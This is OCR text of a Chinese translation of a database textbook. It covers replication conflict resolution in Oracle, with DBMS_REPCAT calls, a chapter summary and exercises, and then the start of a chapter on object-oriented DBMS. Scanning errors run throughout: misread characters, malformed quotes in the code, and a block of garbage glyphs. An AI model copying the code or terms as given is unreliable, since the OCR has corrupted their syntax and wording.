@ 更 新 冲突 (update conflict)。 当 对 某 行 修改 的 复制 与 对 同一 行 的 男 一 个 修改 冲突 时 ， 
则 出 现 所 谓 更 新 冲突 。 更 新 冲突 发 生 在 源 自 不 同 结 点 的 两 个 事务 几乎 同时 修改 同一 
行 的 情形 。 

@ 唯一 性 冲突 ( uniqueness conflict)。 当 复制 行 时 ， 若 违反 实体 完整 性 约束 ， 则 出 现 所 
谓 唯一 性 冲突 。 例 如 ， 如 果 源 自 不 同 结 点 的 两 个 事务 ,分 别 插入 具有 相同 主 关 键 字 
的 一 行 在 自己 结 点 上 的 表 副 本 中 ， 那 么 将 发 生 唯 一 性 冲突 。 

e 删除 冲突 ( delete conflict)。 有 源 自 不 同 结 点 的 两 个 事务 ， 若 其 中 一 个 事务 在 修改 某 
行 时 ， 另 一 事务 也 修改 或 删除 同一 行 ， 则 出 现 删除 冲突 。 

冲突 在 每 个 主 结 点 上 独立 地 进行 消解 。 接 收 的 主 结 点 或 主 物化 视图 结 点 检查 是 否 出 现下 
列 冲突 情况 : 

e 被 复制 行 的 旧 值 (修改 之 前 的 值 ) 与 在 接收 结 点 同一 行 的 当前 值 是 否 有 差别 (更 新 

冲突 )。 

。 一 个 复制 行 在 进行 INSERT 或 UPDATE 时 是 否 违反 唯一 性 约束 (唯一 性 冲突 )。 

。 执行 UPDATE 或 DELETE 某 行 的 语句 时 因 主 关键 字 不 存在 而 找 不 到 该 行 (删除 
冲突 )。 

为 了 消解 更 新 复制 冲突 ， 需 要 一 个 机 制 来 保障 冲突 的 解决 与 应 用 本 身 的 业务 逻辑 规则 相 
一 致 ， 同 时 保证 在 所 有 结 点 上 数据 正确 收敛 。Oracle Advanced Replication 提供 了 若干 预定 
义 的 冲突 消解 方法 ， 用 以 支持 用 户 定义 处 理 许多 公共 冲突 的 冲突 消解 机 制 。 此 外 ， 用 户 还 能 
自 定义 冲突 消解 方法 (例如 ， 对 于 删除 和 排序 冲突 ，Oracle 就 没有 预定 义 的 方法 )。 预 定义 
的 方法 包括 了 26.3.4 节 讨 论 过 的 许多 技术 ， 比 如 最 近 和 最 早 时间 戳 、 最 大 和 最 小 值 、 累 加 和 
平均 值 ， 以 及 结 点 优先 权 等 。 此 外 ，Oracle 也 提供 了 方法 ， 用 以 复写 和 废除 一 组 值 或 优先 
权 ， 用 它 能 给 列 中 每 个 值 赋 一 个 优先 权 ， 一 旦 检测 到 冲突 ， 优 先 权 列 值 较 低 的 表 将 修改 为 优 
先 权 较 高 的 表 中 的 数据 。 

除了 更 新 、 唯 一 性 和 删除 冲突 ， 当 存在 三 个 以 上 主 结 点 时 还 可 能 发 生 顺 序 冲 突 。 如 果 对 
某 个 主 结 点 的 修改 传播 因 故 阻塞 ， 而 对 其 他 主 结 点 关于 复制 数据 的 修改 传播 仍 不 断 进行 ， 那 
么 当 故 障 的 结 点 重启 传播 后 ， 这 些 未 曾 传播 的 修改 可 能 会 以 与 传 到 其 他 主 结 点 不 同 的 顺序 传 
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到 这 个 主 结 点 上 来 ， 从 而 可 能 发 生 更 新 冲突 。 此 时 ， 为 保证 数据 收敛 ， 必 须 采 用 某 种 能 保证 
数据 收敛 的 冲突 消解 方法 ， 也 就 是 最 近 时 间 惟 、 最 小 最 大 值 、 优 先 权 组 和 累加 值 等 方法 中 的 
一 种 。 

Oracle 也 使 用 列 组 ( column group) 来 检测 和 消解 冲突 。 列 组 是 由 复制 表 中 一 列 或 多 列 
组 成 的 逻辑 组 。 任 一 个 列 不 能 属于 多 于 一 个 列 组 ， 那 些 没有 明确 指定 列 组 的 列 都 属于 一 个 隐 
蔽 列 组 ， 该 列 组 使 用 默认 的 冲突 处 理 方法 。 

可 以 使 用 包 DBMS_REPCAT 创建 列 组 并 为 其 指定 的 冲突 消解 方法 。 例 如 ， 为 了 在 Staff 
表 中 使 用 最 近 时 间 戳 消解 方法 来 处 理 对 员工 工资 的 变化 ， 需 要 在 Staff 表 中 维持 一 个 称 为 
salaryTimestamp 的 时 间 戳 列 ， 使 用 如 下 的 两 个 过 程 调用 : 


EXECUTE DBMS_REPCAT.MAKE_ COLUMN _GROUP ( 
gname = HR， 
oname = ‘STAFF,, 
column group = ‘SALARY _ GP, 
list_of_column_names ‘staffNo, salary, salaryTimestamp’); 


EXECUTE DBMS_ REPCAT.ADD _ UPDATE RESOLUTION ( 
sname = ‘HR,, 
oname = ' STAFF ， 
column_group = ‘SALARY_GP, 
sequence no 一 1, 
method = LATEST_TIMESTAMP,, 
parameter_column name = ‘salaryTimestamp,, 
comment = ‘Method 1 added om || sysdate); 


DBMS_REPCAT 包 同 时 包含 创建 优先 权 组 和 优先 权 结 点 的 例 程 。 列 组 、 优 先 权 组 和 优 
先 权 结 点 也 能 够 通过 Oracle Replication Manager 交互 式 地 创建 。 


本 章 小 结 

e 复制 (replication) 是 在 一 个 或 多 个 结 点 上 产生 和 再 生产 多 个 数据 副本 的 过 程 。 它 是 一 种 重要 的 机 

制 ， 使 得 一 个 组 织 机 构 能 做 到 ， 只 要 其 用 户 需 要 ， 无 论 何 时 何 地 都 能 访问 当前 数据 。 

数据 库 复 制 的 主要 好 处 (benefit) 表现 在 能 改善 可 用 性 、 可 靠 性 ， 通 过 减少 负载 提高 系统 性 能 ， 支 

持 非 连接 计算 、 多 用 户 和 一 些 高 级 应 用 。 

积极 (同步 ) 复制 (eager replication ) 指 当 源 数据 发 生 更 新 的 时 候 复制 数据 立刻 进行 更 新 ， 这 通常 

由 2PC (两 阶段 提交 ) 协议 实现 。 懒 情 (异步 ) 复制 (lazy replication ) 指 被 复制 的 目标 数据 库 的 更 

新 滞后 于 源 数据 库 更 新 一 段 时 间 。 源 和 目标 数据 库 之 间 重 新 获得 一 致 性 的 时 间 可 能 要 延迟 数秒 到 数 

小 时 ， 甚 至 数 天 。 然 而 ， 数 据 最 终 会 在 所 有 的 结 点 上 同步 。 

复制 服务 器 (replication server) 是 管理 数据 副本 的 软件 系统 。 

e 数据 所 有 权 模 式 (data ownership model) 分 主 备份 和 辅 备份 、 工 作 流 和 随处 更 新 (点 对 点 )。 在 前 两 
种 模式 中 ， 副 本 是 只 读 的 。 在 随处 更 新 模式 中 ， 每 个 副本 都 可 以 进行 更 新 ， 并 且 需 要 提供 冲突 检测 
和 消解 的 机 制 来 保证 数据 的 完整 性 。 

e 在 数据 库 内 核实 现 复制 协议 称 为 基于 内 核 复制 ， 若 在 被 复制 数据 库 系 统 之 上 另 加 一 层 中 间 件 来 实现 
复制 协议 则 称 为 基于 中 间 件 复制 。 

e 更 新 过 程 必须 维持 事务 一 致 性 。 单 副本 可 串 行 性 ( 1-copy-serializability) 是 复制 数据 库 中 并 发 数据 
处 理 的 正确 性 准则 。 积 极 随处 更 新 ( eager update anywhere) 复制 可 伸缩 性 差 。 懒 情 随 处 更 新 (lazy 
update anywhere) 复制 不 得 不 频繁 处 理 冲 突 。 
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已 证 明快 照 隔离 ( snapshot isolation) 对 复制 技术 是 一 种 好 方案 。 组 通信 协议 ( group communication 
protocol) 保证 消息 以 全 序 送 达 。 

移动 数据 库 ( mobile database) 指 便携 式 的 、 与 公共 数据 库 服务 器 物理 分 离 ， 但 却 能 从 远程 结 点 与 
公共 数据 库 服 务 器 保持 通信 ， 支持 共 享 公共 数据 的 数据 库 。 使 用 移动 数据 库 ， 用 户 可 以 使 用 笔记 本 
电脑 、PDA 或 其 他 Internet 访问 设备 访问 应 用 所 要 求 的 远程 结 点 上 的 公共 数据 。 

有 若干 与 移动 DBMS 相关 的 问题 需要 考虑 ， 包 括 管理 受 限 的 资源 、 安 全 性 、 事 务 处 理 和 查询 处 理 。 
通常 的 事务 模型 对 于 移动 环境 可 能 并 不 合适 。 不 连通 是 主要 问题 ， 特 别 是 当 事 务 长 寿 和 有 大 量 的 不 
连通 情形 时 。 频 繁 的 不 连通 使 得 可 靠 性 成 为 移动 环境 下 事务 处 理 的 主要 需求 。 进 一 步 ， 由 于 移动 主 
机 (MH) 能 从 一 个 蜂窝 移动 到 另 一 个 蜂窝 ， 那 么 移动 事务 也 会 在 一 组 被 访问 的 结 点 间 跳 跃 。 
Kangaroo 事务 模型 、 报 告 与 联合 事务 模型 和 MoFlex 事务 模型 是 基于 开放 骨 套 事务 和 拆 分 事务 的 概 
念 ， 文 持 移 动 性 和 不 连通 性 。 移 动 主 机 每 开始 一 个 事务 ， 在 该 MH 所 连通 的 移动 基站 上 就 开始 一 个 
子 事务 。 

子 事 务 具有 可 补偿 、 可 重复 、 枢 轴 以 及 位 置 相关 等 几 种 类 型 ， 子 事务 正确 的 执行 顺序 能 保证 即使 不 
连通 也 能 终止 。 

MoFlex 事务 模型 允许 定义 关于 时 间 、 代 价 和 位 置 的 谓词 ， 用 以 影响 事务 的 执行 。 

在 移动 环境 下 考虑 查询 处 理 ， 必 须 处 理 位 置 知晓 查询 (location-aware query) 和 位 置 相关 查询 
( locationdependent query)， 还 有 移动 对 象 数 据 库 查询 (moving object database query)、 时 空 查 询 
( spatio-temporal query) 和 连续 查询 ( continuous query)。 为 能 处 理 位 置 相关 查询 ， 数 据 库 需 能 存储 
二 维 至 三 维 的 集合 形状 和 和 集合 操作 ， 例 如 计算 形状 的 相交 部 分 。 


思考 题 

26.1 何谓 数据 复制 ? 

26.2 ”指出 在 分 布 式 系统 中 采用 复制 技术 的 好 处 。 
26.3 给 出 使 用 复制 的 典型 应 用 。 

26.4 对 比分 析 同 步 与 异步 复制 。 

26.5 何谓 复制 服务 器 ? 

26.6 对比 分析 在 复制 环境 中 可 用 的 不 同 数据 所 有 权 模 式 ， 并 对 每 个 模式 试 举 一 例 。 
26.7 讨论 复制 服务 器 应 有 的 功能 。 

26.8 讨论 与 复制 相关 的 实现 问题 。 

26.9 ”说明 移 动 数据 库 如 何 支 持 移动 工作 者 。 
26.10 讨论 移动 DBMS 应 具备 的 功能 。 

26.11 讨论 由 移动 DBMS 引发 的 问题 。 

26.12 ”讨论 Kangaroo 事务 模型 。 


习题 
26.13 ”假设 DreanHome 的 常务 经 理 要 求 你 调查 该 组 织 的 数据 分 布 要 求 ， 并 且 准 备 一 份 关 于 复制 服务 


器 洪 在 应 用 的 报告 。 报 告 必须 对 集中 式 DBMS 和 复制 服务 器 进行 比较 ， 并 且 指 出 在 本 组 织 内 实 
现 数据 库 复制 的 利弊 ， 以 及 任何 可 以 预见 的 问题 。 报 告 还 应 该 说 明 使 用 复制 服务 器 解决 分 布 需 
求 的 可 能 性 。 最 后 ， 报 告 应 该 包含 一 组 完全 合理 的 建议 ， 并 为 DreanHome 推荐 一 个 适当 的 解 
决 方案 。 


26.14 


26.15 


26.16 
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假设 DreanHome 的 常务 经 理 要 求 你 调查 该 组 织 内 如 何 使 用 移动 数据 库 技术 。 调 查 结果 用 报告 

给 出 ， 报 告 要 求 说 明 移动 计算 的 潜在 优势 以 及 在 在 本 组 织 内 使 用 移动 数据 库 可 能 存在 的 问题 。 

报告 还 应 该 包含 一 组 合理 的 建议 并 为 DreanHome 推荐 一 个 适当 的 解决 方案 。 

在 26.3.1 节 讨论 过 一 个 多 数 一 致 协议 ,该 协议 描述 多 数 个 辅 结 点 如 何 形 成 一 个 新 纪元 集合 。 而 

把 如 何 建立 新 主 结 点 协议 的 细节 留 作 了 练习 。 因 此 ， 本 练习 题 是 详细 制定 一 个 协议 ， 它 是 关于 

辅 结 点 构成 的 纪元 集合 必须 依据 下 列 信息 推选 出 一 个 新 的 主 结 点 : 

@ 多 数 必 重 释 ， 故 而 老 纪元 集合 中 至 少 有 一 个 成 员 在 新 纪元 集合 中 。 

e 若 出 现在 新 老 纪元 集合 交集 中 的 成 员 就 是 原来 的 主 结 点 ， 该 结 点 可 能 还 是 过 时 了 。 

@ 若 新 纪元 集合 中 不 包含 老 纪元 的 领袖 ， 选 举 新 的 主 备份 可 能 要 考虑 某 些 因素 ， 比 如 可 用 的 
人 磁盘 空间 、 结 点 是 否 处 于 接近 一 致 的 状态 。 

阅读 下 面 一 或 多 篇 论文 ， 考 虑 它们 都 提出 了 复制 环境 下 什么 特殊 问题 : 


Agrawal D., Alonso G., Abbadi A.E., and Stanoi |. (1997). Exploiting atomic broadcast in replicated databases 
(extended abstract), In Proc 3rd Int. Euro-Par Conf on Parallel Processing Springer-Verlag, 496-503. 


Gifford D.K. (1979). Weighted voting for replicated data. In Proc 7th ACM Symp. on Operating Systems Pnnciples, 
ACM, 150-162. 


Gray 小 Helland P, O'Neil P.E, Shasha D, jagadish H.V,, and Mumick |.S, eds (1996). The dangers of replication 
and a solution. Proceedings of the 1996 ACM SIGMOD Intemational Conference on Management of Data, Montreal, 
Quebec, Canada: ACM Press; 173-182, 


Kemme B. and Alonso G. (2000), A new approach to developing and implementing eager database replication 
protocols. ACM Trans. Database Syst. 25, 333-379， 


Kemme B. and Alonso, G. (2000). Don't be lazy, be consistent: Postgres-R, a new way to implement database 
replication. VLDB ‘00: Proc 26th Int. Conf on Very Large Data Bases, Morgan. 


Kemme B, jimenez-Peris R, and Patino-Martinez, M. (2010). Database replication, In Synthesis Lectures on Data 
Management. 2, 1-153， 


Pedone F., Wiesmann M., Schiper A., Kemme B, and Alonso G. (2000). Understanding replication in databases 
and distributed systems. ICDCS, 464-474. 


Vogels W. (2009). Eventually consistent. Commun ACM, 52, 40-44. 


Wiesmann M., Schiper A, Pedone F.,, Kemme B., and Alonso G. (2000). Database replication techniques: a three 
parameter classification. Proc | 9th IEEE Symp. on Reliable Distributed Systems. |EEE Computer Society. 


三 全 多 人 Cn 一 < SS 
全 ‘Oo Yap se nel 
hoiipRl' OS beveg zie nl 


oA -Rir > © ww SAO Se 9 


“i! esl iY o nlp 
bd ° 
2 ow pp. 


由 = | ®。. Oy 
-lap ES oe -= biy 2 
CES 一 oie 
4 Msp' Ve 要 
WA 
a A . 
'' 
ct 一 -3 we 
© ee oe 
®@ 和 Sa 
0 ee 
二 所 
aD ies = 
| 
人 
' 


| 第 七 部 分 


Database Systems: A Practical Approach to Design, Implementation, and Management, 6E 


对 象 DBMS 


第 27 章 OODBMS 一 一 概念 与 设计 
第 28 章 OODBMS 一 一 标准 与 系统 





第 27 章 | 


Database Systems: A Practical Approach to Design, Implementation, and Management, 6E 


OODBMS 一 一 概念 与 设计 





| 本 章 目标 
本 章 我 们 主要 学 习 
e 下 一 代数 据 库 系 统 的 主要 构成 
面向 对 象 数 据 模型 的 框架 
函数 数据 模型 与 持久 编程 语言 的 基础 
开发 OODBMS 的 主要 策略 
传统 DBMS 采用 的 二 级 存储 模型 与 OODBMS 采用 的 单 级 存储 模型 之 间 的 差别 
指针 切换 技术 的 工作 原理 
传统 DBMS 如 何 访问 记录 与 OODBMS 如 何 访问 辅 存 中 的 对 象 的 差别 
在 编程 语言 中 支持 持久 性 的 不 同方 案 
正 交 持久 性 的 优点 和 缺点 
OODBMS 的 各 种 基本 问题 ， 包 括 扩展 的 事务 模型 、 版 本 管理 、 模 式 演化 、 OODBMS 
体系 结构 以 及 基准 测试 
e OODBMS 的 优点 和 缺点 
e OODBMS 与 ORDBMS 在 数据 建 模 、 数 据 访问 和 数据 共享 等 方面 的 比较 
@ 用 UML 进行 面向 对 象 数 据 库 分 析 与 设计 的 基础 


面向 对 象 是 一 种 软件 构建 方法 ,已 经 证 明 它 对 解决 软件 开发 中 的 一 些 典 型 问题 非常 有 
效 。 对 象 技术 背后 隐 含 的 基本 概念 是 : 软件 应 该 尽 可 能 地 由 标准 的 、 可 重用 的 构件 组 成 。 传 
统 上 ， 软 件 工程 和 数据 库 管理 是 作为 相互 独立 的 学 科 存 在 的 。 数 据 库 技术 集中 关注 软件 的 静 
态 方 面 一 一 信息 存储 ， 而 软件 工程 则 建 模 软件 的 动态 方面 。 随 着 第 三 代数 据 库 管理 系统 一 一 
面向 对 象 的 数据 库 管 理 系 统 ( Object-Oriented Database Management System ，OODBMS ) 和 
对 象 关 系数 据 库 管 理 系统 ( Object-Relational Database Management System，ORDBMS ) 的 
提出 ， 这 两 个 学 科 已 经 相互 结合 ， 允 许 同时 对 数据 及 其 处 理 过 程 进行 建 模 。 

然而 ， 对 于 下 一 代 DBMS 目前 还 存在 着 很 大 的 争议 。 在 过 去 的 20 多 年 里 ， 关 系 系 统 所 
取得 的 成 果 是 有 目 共 睹 的 ， 传 统 主义 者 认为 扩展 关系 模型 以 支持 另外 的 (面向 对 象 ) 功能 就 
足够 了 。 而 另 一 些 人 则 认为 ， 底 层 的 关系 模型 不 足以 处 理 复 杂 的 应 用 ， 例 如 计算 机 辅助 设 
计 、 计 算 机 辅助 软件 工程 和 地 理 信 息 系统 等 。 为 了 帮助 读者 理解 这 些 新 型 的 DBMS 以 及 双 
方 的 争论 ， 我 们 将 用 两 章 的 篇 幅 对 这 些 技 术 及 其 相关 的 问题 进行 讨论 。 

本 章 首 先 分 析 高 级 数据 库 应 用 的 特征 以 及 为 什么 传统 的 关系 DBMS 不 能 很 好 地 支持 这 
些 新 的 应 用 。 接 下 来 讨论 将 面向 对 象 的 概念 和 数据 库 系 统 相 集成 的 相关 问题 ， 即 OODBMS 。 
OODBMS 最 先 用 于 工程 与 设计 领域 ， 最 近 变 得 受到 金融 和 无 线 电 通信 应 用 领域 的 欢迎 。 与 
关系 型 DBMS 所 占 市 场 份额 相 比 ，OODBMES 市 场 较 小 ， 尽 管 兽 有 人 预计 到 20 世纪 90 年 代 
末 OODBMS 的 市 场 占有 率 将 增长 为 50% ， 但 实际 市 场 份额 并 没有 这 么 大 。 
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下 一 章 分 析 对 象 数据 管理 组 ( Object Data Management Group，ODMG) 提出 的 对 象 模型 ， 该 
模型 已 经 成 为 OODBMS 事实 上 的 标准 。 此 外 还 将 介绍 ObjectStore， 它 是 一 个 商品 化 OODBMS。 

将 面向 对 象 的 概念 与 数据 库 系统 相 结合 从 而 抛弃 传统 的 关系 数据 模型 有 时 被 称 为 一 种 
革命 性 的 方法 。 与 之 相 比 ， 在 第 9 章 我 们 研究 了 一 种 更 具 进化 性 的 方法 一 一 通过 扩展 关系 
模型 从 而 将 面向 对 象 的 概念 与 数据 库 系 统 相 结合 。 这 些 进化 的 系统 被 称 为 ORDBMS， 更 
早期 曾 被 称 为 扩展 的 关系 DBMS。 在 那 章 还 具体 查看 了 ANSILISO 最 新 发 布 的 SQL 标准 
SQL:2011, 以 及 Oracle 中 已 有 的 一 些 面 向 对 象 特 性 。 
| 本 章 结构 

27.1 节 简要 回顾 数据 库 管理 系统 的 历史 ， 导 出 第 三 代数 据 库 管理 系统 一 一 面向 对 象 
DBMS 和 对象 关系 DBMS。27.2 节 简 介面 向 对 象 数据 模型 和 持久 型 编程 语言 ， 并 且 讨 论 为 
什么 至 今 还 未 出 现 一 个 像 关系 数据 模型 那样 的 被 广泛 接受 的 面向 对 象 的 数据 模型 。27.3 节 将 
分 析 传 统 DBMS 使 用 的 二 级 存储 模型 与 OODBMS 使 用 的 单 级 存储 模型 之 间 的 区 别 及 其 对 
数据 访问 的 影响 。 也 将 讨论 在 编程 语言 中 支持 持久 性 的 各 种 不 同 的 方法 ， 以 及 不 同 的 指针 切 
换 技术 。27.4 节 将 讨论 其 他 一 些 与 OODBMS 相关 的 问题 ， 比 如 扩展 的 事务 模型 、 版 本 管理 、 
模式 演化 、OODBMS 体系 结构 以 及 基准 测试 。27.5 节 将 分 析 OODBMS 的 优 缺 点 。27.6 节 
将 总 结 ORDBMS 与 OODBMS 的 差别 。27.7 节 和 27.8 节 将 简要 分 析 如 何 对 第 16 章 和 第 17 
章 讨 论 的 概念 和 逻辑 数据 库 设 计 方 法 学 进行 扩展 ， 以 支持 面向 对 象 的 数据 库 设计 。 本 章 使 用 
的 例子 还 是 来 自 11.4 节 和 附录 A 中 的 DreamHome 案例 。 


27.1 下 一 代数 据 库 系统 


在 20 世纪 60 年 代 末 70 年 代 初 ， 有 两 种 主流 的 构建 DBMS 的 方法 。 第 一 种 方法 是 基于 
层次 的 数据 模型 ， 以 IBM 的 IMS (Information Management System， 信 息 管 理 系统 ) 为 典型 
代表 ， 这 种 方法 是 为 了 满足 美国 阿波 罗 空 间 计 划 所 产生 的 大 量 信息 存储 的 需要 。 第 二 种 方法 
是 基于 网 络 的 数据 模型 ， 这 种 方法 试图 创建 一 种 数据 库 标 准 并 解决 层次 模型 的 一 些 难题 ， 例 
如 层次 模型 无 法 有 效 地 表示 复杂 的 联系 。 这 些 方法 共同 代表 了 第 一 代 DBMS。 然 而 这 两 种 模 
型 具有 一 些 根本 上 的 缺点 : 

e 由 于 两 者 支持 面向 记录 的 导航 式 访 问 ， 因 此 即使 是 很 简单 的 查询 也 必须 用 复杂 的 程 

序 才能 回答 。 

e 数据 独立 性 非常 低 。 

e 没有 被 广泛 接受 的 理论 基础 。 

在 1970 年 ，Codd 发 表 了 关于 关系 数据 模型 的 开创 性 论文 。 这 篇 论文 出 现 得 非常 及 时 ， 
论文 指出 了 先前 方法 的 缺点 ， 尤 其 是 缺乏 数据 独立 性 这 一 点 。 此 后 ， 出 现 了 许多 实验 性 的 
关系 DBMS， 并 且 在 20 世纪 70 年 代 末 80 年 代 初 出 现 了 第 一 个 商品 化 关系 DBMS。 时 至 今 
日 ， 运 行 在 大 型 机 和 PC 环境 下 的 关系 DBMS 已 经 超过 了 一 百 个 ， 虽 然 其 中 一 些 对 关系 模型 
的 定义 进行 了 扩展 。 关 系 DBMS 被 称 为 第 二 代 DBMS。 

然而 ， 正 如 在 9.2 节 讨 论 的 那样 ，RDBMS 也 有 它 的 缺点 ， 尤 其 是 其 有 限 的 建 模 能 力 。 
大 量 的 研究 工作 都 在 试图 解决 这 个 问题 。1976 年 ，Chen 提出 了 实体 联系 模型 ， 该 模型 现在 
已 经 是 数据 库 设 计 中 被 广泛 接受 的 一 种 技术 ， 也 是 本 书 第 16 章 和 17 章 所 述 的 方法 学 的 基础 
(Chen, 1976 )。1979 年 , Codd 自己 试图 用 一 个 被 称 为 RM/T 的 关系 模型 的 扩展 版 本 (Codd， 
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1979 ) 解决 他 早期 工作 中 的 一 些 缺 陷 ， 后 来 ，RM/T 又 演化 为 RM/V2( Codd，1990 )。 所 有 
试图 提出 一 种 更 加 准确 地 表示 “现实 世界 ”数据 模型 的 工作 都 被 粗略 地 归 类 为 语义 数据 建 模 
(semantic data modeling)。 其 中 较 著 名 的 模型 有 : 

@ 语义 数据 模型 (Hammer and McLeod，1981 )。 

e 函数 数据 模型 (Shipman，1981 )。 

e 语义 关联 模型 (Su，1983 )。 

为 了 适应 日 益 复杂 的 数据 库 应 用 ， 出 现 了 两 种 “新 的 ”数据 模型 : 面向 对 象 数据 模 
型 ( Object-Oriented Data Model，OODM) 和 对 象 -关系 数据 模型 ( Object-Relational Data 
Model，ORDM)， 后 者 曾 被 称 为 扩展 的 关系 数据 模型 (Extended Relational Data Model， 
ERDM)。 不 同 于 以 前 的 模型 ， 这 些 模型 的 实际 组 成 结构 并 不 确定 。 这 种 演化 代表 了 第 三 代 
DBMS， 如 图 27-1 所 示 。 

目前 ， 在 OODBMS 的 倡导 者 与 关系 模型 
的 支持 者 之 间 产 生 了 很 大 的 争论 ， 就 像 20 世 
纪 70 年 代 的 网 状 数据 模型 与 关系 数据 模型 之 
争 。 双 方 都 同意 传统 的 关系 DBMS 已 经 不 能 
满足 某 些 类 型 的 应 用 ， 但 到 底 什 么 是 最 好 的 
解决 方案 双方 却 有 分 歧 。OODBMS 的 倡导 者 
声称 RDBMS 能 够 满足 标准 的 商业 应 用 ， 但 
是 并 不 具备 支持 更 加 复杂 的 应 用 的 能 力 。 关 
系 DBMS 的 支持 者 则 表示 关系 的 技术 是 任何 
一 个 实际 的 DBMS 的 必要 组 成 部 分 ， 复 杂 应 
用 可 以 通过 扩展 关系 模型 的 方式 解决 。 

目前 ， 关 系 DBMS 与 对 象 关系 DBMS 
构成 了 主流 系统 ， 而 面向 对 象 的 DBMS 也 在 一 
市 场 上 占据 了 自己 的 一 席 之 地 。 当 然 ， 如 果 图 27-1 数据 模型 的 发 展 史 
OODBMS 要 想 成 为 主流 系统 ， 它 必须 改变 只 能 适用 于 复杂 应 用 的 形象 ， 并 且 与 其 竞争 对 手 
关系 DBMS 一 样 ， 也 能 够 提供 相同 的 工具 和 同等 的 易 用 性 以 支持 标准 的 商业 应 用 。 特 别 是 ， 
OODBMS 必须 支持 与 SQL 兼容 的 说 明 性 查询 语言 。 我 们 将 用 本 章 的 部 分 篇 幅 和 整个 第 28 
章 来 讨论 OODBMS ,在 第 9 章 已 讨论 完 ORDBMS。 








27.2 OODBMS 简介 


本 节 讨 论 与 OODBMS 有 关 的 背景 知识 ， 包 括 函 数 数据 模型 和 持久 型 编程 语言 。 首 先 来 
看 OODBMS 的 定义 。 


27.2.1 面向 对 象 DBMS 的 定义 


本 节 将 给 出 几 种 已 有 的 面向 对 象 DBMS 的 定义 。Kim ( 1991 ) 将 面向 对 象 数据 模型 
(OODM)、 面 向 对 象 数据 库 (OODB) 以 及 面向 对 象 数据 库 管 理 系统 (OODBMS ) 分 别 定义 为 : 


| OODM | 一 种 能 反映 由 面向 对 象 程 序 设计 所 支持 对 象 的 语义 的 (逻辑 ) 数据 模型 。 
| OODB | 由 OODM 定义 的 一 组 持久 的 、 可 共享 的 对 象 。 
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| OODBMS | OODB 的 管理 器 。 


这 些 定义 都 是 非 描述 性 的 ,但 反映 了 这 样 一 个 事实 : 没有 哪个 面向 对 象 的 数据 模型 与 关 
系 系 统 的 基本 数据 模型 等 价 。 对 于 基本 功能 ， 每 种 系统 都 提供 了 自己 的 解释 。 例 如 ，Zdonik 
and Maier ( 1990 ) 提出 了 一 个 OODBMS 最 低 限 度 必须 满足 : 

(1 ) 必须 支持 数据 库 的 功能 。 

(2 ) 必须 支持 对 象 标识 。 

(3 ) 必须 支持 封装 。 

(4 ) 必须 支持 具有 复杂 状态 的 对 象 。 

一 些 作 者 争论 ， 尽 管 继承 可 能 是 有 用 的 ， 但 是 对 定义 OODBMS 来 说 并 不 是 必要 的 ， 因 
此 OODBMS 可 以 不 支持 继承 。 另 外 ，Khoshafian 和 Abnous ( 1990 ) 将 OODBMS 定义 为 ; 

(1) 面向 对 象 三 抽象 数据 类 型 十 继承 十 对 象 标 识 。 

(2 ) OODBMS== 面 向 对 象 十 数据 库 功 能 。 

Parsaye 等 人 (1989 ) 则 给 出 了 OODBMS 的 另外 一 种 定义 。 

(1 ) 基本 系统 中 有 具备 查询 优化 能 力 的 高 级 查询 语言 。 

(2 ) 支持 持久 性 、 原 子 事务 以 及 并 发 和 恢复 控制 。 

(3 ) 支持 复杂 对 象 的 存储 、 索 引 ， 支 持 快速 、 高 效 检索 的 访问 方法 。 

(4) OODBMS 二 面向 对 象 系统 十 (1 ) 十 (2 ) 十 (3)。 

通过 对 当前 一 些 商 业 OODBMS 的 研究 ， 例 如 Gemstone Systems 公司 ( 原 为 Servio 
Logic 公司 ) 的 GemStone、Objectivity 公司 的 Objectivity/DB、Progress Software 公司 的 ( 原 
为 Object Design 公司 ) 的 ObjectStore、 以 及 Versant 公司 的 Versant Database db40 和 Fast 
Objects， 可 以 看 出 面向 对 象 数据 模型 的 概念 是 从 不 同 的 领域 中 抽取 出 来 的 ， 如 图 27-2 所 示 。 
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图 27-2 面向 对 象 数据 模型 的 起 源 


在 28.2 节 我 们 将 研究 对 象 数据 管 理 组 ( Object Data Management Group ，ODMG ) 提出 
的 对 象 模型 ， 多 数 供应 商都 倾向 于 支持 这 个 模型 。ODMG 对 象 模型 之 所 以 很 重要 ， 是 因为 
它 为 数据 库 对 象 的 语义 制定 了 一 种 标准 模型 ， 并 支持 兼容 的 OODBMS 之 间 的 互 操作 。 对 面 
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向 对 象 数据 模型 的 基本 概念 感 兴趣 的 读者 请 参阅 Dittrich (1986) and Zaniola 等 人 ( 1986 )。 


27.2.2 ”函数 数据 模型 


本 节 将 介绍 函数 数据 模型 ( functional data model，FDM)， 该 模型 是 语义 数据 模型 家 族 
中 最 简单 的 一 种 模型 (Kerschberg 和 Pacheco，1976; Sibley 和 Kerschberg，1977 ) 。 函 数 数 
据 模型 很 有 意思 ， 因 为 该 模型 与 对 象 方法 共享 了 某 些 思想 ， 包 括 对 象 标 识 、 继 承 、 重 载 和 导 
航 式 访问 。 在 FDM 中 ,任何 一 个 数据 检索 任务 都 可 以 被 看 作 一 个 计算 并 返回 某 函 数 结果 的 
过 程 ， 该 函数 可 能 有 0、1 或 多 元 参数 。 这 种 产生 式 数 据 模型 概念 简单 ， 同 时 也 极 富 表现 力 。 
在 FDM 中 ， 主 要 的 建 模 原 语 是 实体 和 函数 联系 。 
实体 

实体 可 分 为 (抽象 ) 实体 类 型 和 可 打印 实体 类 型 。 实 体 类 型 与 “现实 世界 ”对 象 的 类 相 
对 应 ， 并 被 声明 为 带 有 0 个 参数 、 返 回 类 型 为 ENTITY 的 函数 。 例 如 ， 可 以 这 样 声 明 Staff 
和 PropertyForRent 这 两 个 实体 类 型 ， 

Staff() 一 上 NTTTY 

PropertyForRent() —» ENTITY 

可 打印 实体 类 型 与 编程 语言 中 的 基本 类 型 类 似 ， 包括: INTEGER、CHARACTER、 
STRING、REAL 和 DATE。 属 性 则 被 定义 为 函数 联系 ,其 参数 是 一 个 实体 类 型 ， 返 回 一 个 
可 打印 实体 类 型 。 实 体 Staff 的 部 分 属性 可 以 被 声明 为 : 

staffNo(Staff) 一 STRING 

sex(Staff) — CHAR 

salary(Staff) — REAL 

上 述 语句 表明 若 将 函数 staffNo 作用 于 某 一 实体 类 型 Staff， 则 返回 该 实体 的 员工 编号 ， 
它 为 可 打印 类 型 STRING 的 一 个 值 。 声 明 组 合 属性 时 ， 先 将 该 组 合 属性 声明 为 某 一 实体 类 
